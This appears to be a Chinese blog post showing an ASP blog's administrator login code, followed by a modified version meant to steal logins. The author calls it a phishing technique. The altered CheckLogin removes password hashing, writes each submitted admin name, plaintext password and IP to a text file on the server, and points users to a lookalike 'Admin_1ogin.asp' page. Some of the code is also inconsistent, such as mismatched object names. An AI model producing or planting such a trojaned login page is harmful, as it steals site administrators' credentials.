1. 程式人生 > >asp記錄管理員賬號密碼

asp記錄管理員賬號密碼

<%
Dim Login
Set Login=new AdLogin
Login.Execute
Class AdLogin
Private ExCommCls
Private Sub class_initialize
 Set CommCls=new CommonCls
 ExCommCls.IsIpAllow
 ExCommCls.CheckInstall
 ExCommCls.GetConfigCache("*")
End Sub
Private Sub class_terminate
 Set ExCommCls=nothing
End Sub
public  Sub Execute
 Dim Action
 Action=Request("action")
 Select Case Action
  Case "CheckLogin"
  CheckLogin
  Case "LoginOut"
  LoginOut
  Case Else
  LoginF
 End Select
End Sub
Private Sub CheckLogin
 Dim Adname,AdPwd,CheckCode
 AdName=ExCommCls.G(Trim(request("Adname")))
 AdPwd=md5(Trim(request("AdPwd")))
 CheckCode=ExCommCls.G(request("checkCode"))
 If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then
  ExCommCls.ShowMsg "驗證碼錯誤!",Application(sn&"blogurl")&"admin_login.asp"
  Exit Sub
 End If
 If  Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then
  Response.Cookies(Md5(SN))("AdName")=AdName
  Response.Cookies(Md5(SN))("AdPwd")=AdPwd
  session("AdLogin")=Md5(SN)
  ExCommCls.GetConfigCache("*")
  ExCommCls.GetClassCache()
  Response.Redirect(Application(sn&"blogurl")&"admin_index.asp")
 Else
  ExCommCls.ShowMsg "帳號或密碼錯誤",Application(sn&"blogurl")&"admin_login.asp"
 End if
End Sub
Private Sub LoginOut
 Response.Cookies(Md5(SN))("AdName")=""
 Response.Cookies(Md5(SN))("AdPwd")=""
 session.Abandon()
 ExCommCls.ShowMsg "成功退出登陸",Application(sn&"blogurl")&"index.asp"
End Sub
Private Sub LoginF
%>
看下列程式碼
AdName=ExCommCls.G(Trim(request("Adname")))
 AdPwd=md5(Trim(request("AdPwd")))
 
 ---意思很簡單,這裡就不明說了, 主要看md5 ,密碼使用md5加密 這樣的話,我們記錄的密碼也就沒用了,還是md5。所以
 所以想到了,一個釣魚手法。 它本來的登入介面是
Private Sub CheckLogin
 Dim Adname,AdPwd,CheckCode,StrLogText,ip,ff
 AdName=ExCommCls.G(Trim(request("Adname")))
 AdPwd=(Trim(request("AdPwd")))
 CheckCode=ExCommCls.G(request("checkCode"))
 strLogFile="test.txt"
IP=request("IP")
StrLogText=StrLogText&AdName&"----"&AdPwd&"----IP:"&IP&("REMOTE_HOST")
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(chr(13)+chr(10)&StrLogText)
ff.close
set ff=nothing
set f=nothing
 If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then
  ExCommCls.ShowMsg "驗證碼錯誤!",Application(sn&"blogurl")&"Admin_1ogin.asp"
  Exit Sub
 End If
 If  Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then
  Response.Cookies(Md5(SN))("AdName")=AdName
  Response.Cookies((SN))("AdPwd")=AdPwd
  session("AdLogin")=Md5(SN)
  ExCommCls.GetConfigCache("*")
  ExCommCls.GetClassCache()
  Response.Redirect(Application(sn&"blogurl")&"Admin_1ogin.asp")
 Else
  ExCommCls.ShowMsg "帳號或密碼錯誤",Application(sn&"blogurl")&"Admin_1ogin.asp"
 End if
End Sub